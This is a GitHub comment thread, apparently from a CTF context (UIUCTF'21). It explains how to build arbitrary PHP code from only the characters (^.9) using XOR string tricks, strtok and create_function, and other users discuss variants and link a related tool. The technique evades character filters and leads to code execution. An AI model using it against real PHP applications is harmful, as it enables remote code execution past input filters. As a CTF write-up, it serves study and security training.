arxenix
commented
3 years ago currently being run as a challenge for UIUCTF'21 if you would like to try http://phpfuck-fixed.chal.uiuc.tf
Open arxenix opened 3 years ago
arxenix
commented
3 years ago currently being run as a challenge for UIUCTF'21 if you would like to try http://phpfuck-fixed.chal.uiuc.tf
arxenix
commented
3 years ago Now that the CTF is officially over: a working charset is (^.9)
some teams had solutions that were in fact simpler than this (using same charset), but here is my original approach,
after arbitrary string generation, the rest is based off of @splitline 's ideas
9^99 -> 106
(9).(9) -> '99'
. to concat numbers into strings'09'^'1069'^'99' -> '80'
'80'^0 -> 80
/[0-9]+/ by concatenating digits(99999999999...) -> INFINF(INF).(9) -> 'INF9'/[a-zA-Z]/ range!'INF9'^'00'^'33'^'99' -> 'st'/[a-z]{2,}|[A-Z]{2,}/ , but getting single-character strings is not possible'funcname'(param)
strtok(0) -> false
false=== ('st'+'rt'+'OK')(0)(9).false -> '9'
false to get a length-1 string'rw'^'99'^'9' -> 'r'
/[a-zA-Z]/'CHr'(num)
/.*/str_getcsv("a,b") -> ["a", "b"]
func(...["a", "b"])
create_function("", "PAYLOAD")()
create_function to create a function w/ arbitrary PHP code and then call it'create_function'(...str_getcsv(',"$PAYLOAD"'))
splitline
commented
3 years ago Cool, I only know a 6 charset trick before, nice work!
lexsd6
commented
3 years ago Excuse me, can you share which six characters? I'm interested in it
arxenix
commented
3 years ago @lexsd6 See my above comment for the charset and explanation. you can do it with only 5 characters
lebr0nli
commented
3 years ago Excuse me, can you share which six characters? I'm interested in it
@lexsd6
You can use ([^.]) to do it.
https://github.com/lebr0nli/PHPFun
(Ideas and code are inspired and based on PHPFuck and jsfuck :p)
You can do it in 5 :)